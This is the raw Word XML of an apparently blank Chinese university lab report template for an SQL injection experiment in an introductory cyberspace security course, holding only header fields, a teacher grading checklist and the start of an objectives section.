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34AB811">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>《网络空间安全概论》实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605BCE64">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="Times New Roman" w:eastAsia="黑体" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="8380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63"/>
        <w:gridCol w:w="192"/>
        <w:gridCol w:w="1837"/>
        <w:gridCol w:w="431"/>
        <w:gridCol w:w="934"/>
        <w:gridCol w:w="767"/>
        <w:gridCol w:w="2956"/>
      </w:tblGrid>
      <w:tr w14:paraId="3F7D57A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90" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1455" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A52B34A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21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2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>姓名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="551879F6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="513BA7EF">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21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2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>年级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45166205">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5288D0F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90" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1455" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34D992F5">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21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2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>学号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19F34A13">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="34" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="34"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F87602B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21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2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>专业、班级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2956" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46343458">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="63D703F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90" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1263" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F19F4A4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21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2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>实验名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7117" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7ED48B75">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20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2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>实验</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>四</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>SQL注入实验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3C12457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79" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1263" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="296FBFC0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21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2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>实验时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2029" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47AB6494">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="399EBA13">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21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2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>实验地点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3723" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BBB5D0A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5C1CFAA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05" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1263" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="154AF77F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21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2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>实验成绩</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2029" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3897B2E9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03B288CE">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21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2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> 实验性质</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3723" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="326199EC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="-40" w:leftChars="0" w:right="-51" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21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b/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>□验证性  □设计性  □综合性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4850CB6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9" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders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3FA8BB11">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:eastAsia="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>教师评价：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37372D75">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="OLE_LINK31"/>
            <w:bookmarkStart w:id="1" w:name="OLE_LINK41"/>
            <w:bookmarkStart w:id="2" w:name="OLE_LINK21"/>
            <w:bookmarkStart w:id="3" w:name="OLE_LINK47"/>
            <w:bookmarkStart w:id="4" w:name="OLE_LINK56"/>
            <w:bookmarkStart w:id="5" w:name="OLE_LINK29"/>
            <w:bookmarkStart w:id="6" w:name="OLE_LINK64"/>
            <w:bookmarkStart w:id="7" w:name="OLE_LINK5"/>
            <w:bookmarkStart w:id="8" w:name="OLE_LINK63"/>
            <w:bookmarkStart w:id="9" w:name="OLE_LINK59"/>
            <w:bookmarkStart w:id="10" w:name="OLE_LINK65"/>
            <w:bookmarkStart w:id="11" w:name="OLE_LINK10"/>
            <w:bookmarkStart w:id="12" w:name="OLE_LINK19"/>
            <w:bookmarkStart w:id="13" w:name="OLE_LINK27"/>
            <w:bookmarkStart w:id="14" w:name="OLE_LINK9"/>
            <w:bookmarkStart w:id="15" w:name="OLE_LINK45"/>
            <w:bookmarkStart w:id="16" w:name="OLE_LINK44"/>
            <w:bookmarkStart w:id="17" w:name="OLE_LINK57"/>
            <w:bookmarkStart w:id="18" w:name="OLE_LINK30"/>
            <w:bookmarkStart w:id="19" w:name="OLE_LINK20"/>
            <w:bookmarkStart w:id="20" w:name="OLE_LINK37"/>
            <w:bookmarkStart w:id="21" w:name="OLE_LINK60"/>
            <w:bookmarkStart w:id="22" w:name="OLE_LINK53"/>
            <w:bookmarkStart w:id="23" w:name="OLE_LINK46"/>
            <w:bookmarkStart w:id="24" w:name="OLE_LINK4"/>
            <w:bookmarkStart w:id="25" w:name="OLE_LINK28"/>
            <w:bookmarkStart w:id="26" w:name="OLE_LINK40"/>
            <w:bookmarkStart w:id="27" w:name="OLE_LINK43"/>
            <w:bookmarkStart w:id="28" w:name="OLE_LINK49"/>
            <w:bookmarkStart w:id="29" w:name="OLE_LINK54"/>
            <w:bookmarkStart w:id="30" w:name="OLE_LINK55"/>
            <w:bookmarkStart w:id="31" w:name="OLE_LINK6"/>
            <w:bookmarkStart w:id="32" w:name="OLE_LINK58"/>
            <w:bookmarkStart w:id="33" w:name="OLE_LINK48"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">算法/实验过程正确； </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">源程序/实验内容提交  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>程序结构/实验步骤合理；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B74F74E">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">实验结果正确；      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">语法、语义正确；     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>□</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>报告规范；</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59A0E0E8">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
              </w:rPr>
              <w:t>评语：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">                           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="168A75F3">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:right="-51" w:firstLine="330" w:firstLineChars="150"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve">                             评价教师签名（电子签名）：</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
            <w:bookmarkEnd w:id="1"/>
            <w:bookmarkEnd w:id="2"/>
            <w:bookmarkEnd w:id="3"/>
            <w:bookmarkEnd w:id="4"/>
            <w:bookmarkEnd w:id="5"/>
            <w:bookmarkEnd w:id="6"/>
            <w:bookmarkEnd w:id="7"/>
            <w:bookmarkEnd w:id="8"/>
            <w:bookmarkEnd w:id="9"/>
            <w:bookmarkEnd w:id="10"/>
            <w:bookmarkEnd w:id="11"/>
            <w:bookmarkEnd w:id="12"/>
            <w:bookmarkEnd w:id="13"/>
            <w:bookmarkEnd w:id="14"/>
            <w:bookmarkEnd w:id="15"/>
            <w:bookmarkEnd w:id="16"/>
            <w:bookmarkEnd w:id="17"/>
            <w:bookmarkEnd w:id="18"/>
            <w:bookmarkEnd w:id="19"/>
            <w:bookmarkEnd w:id="20"/>
            <w:bookmarkEnd w:id="21"/>
            <w:bookmarkEnd w:id="22"/>
            <w:bookmarkEnd w:id="23"/>
            <w:bookmarkEnd w:id="24"/>
            <w:bookmarkEnd w:id="25"/>
            <w:bookmarkEnd w:id="26"/>
            <w:bookmarkEnd w:id="27"/>
            <w:bookmarkEnd w:id="28"/>
            <w:bookmarkEnd w:id="29"/>
            <w:bookmarkEnd w:id="30"/>
            <w:bookmarkEnd w:id="31"/>
            <w:bookmarkEnd w:id="32"/>
            <w:bookmarkEnd w:id="33"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="宋体"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3B67839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53" w:hRule="atLeast"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8380" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:color="auto" w:sz="4" w:space="0"/>
            </w:tcBorders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6ADCBE5E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/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2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>一、实验目的</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13FC1DEC">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="283" w:leftChars="0" w:hanging="283" w:firstLineChars="0"/>
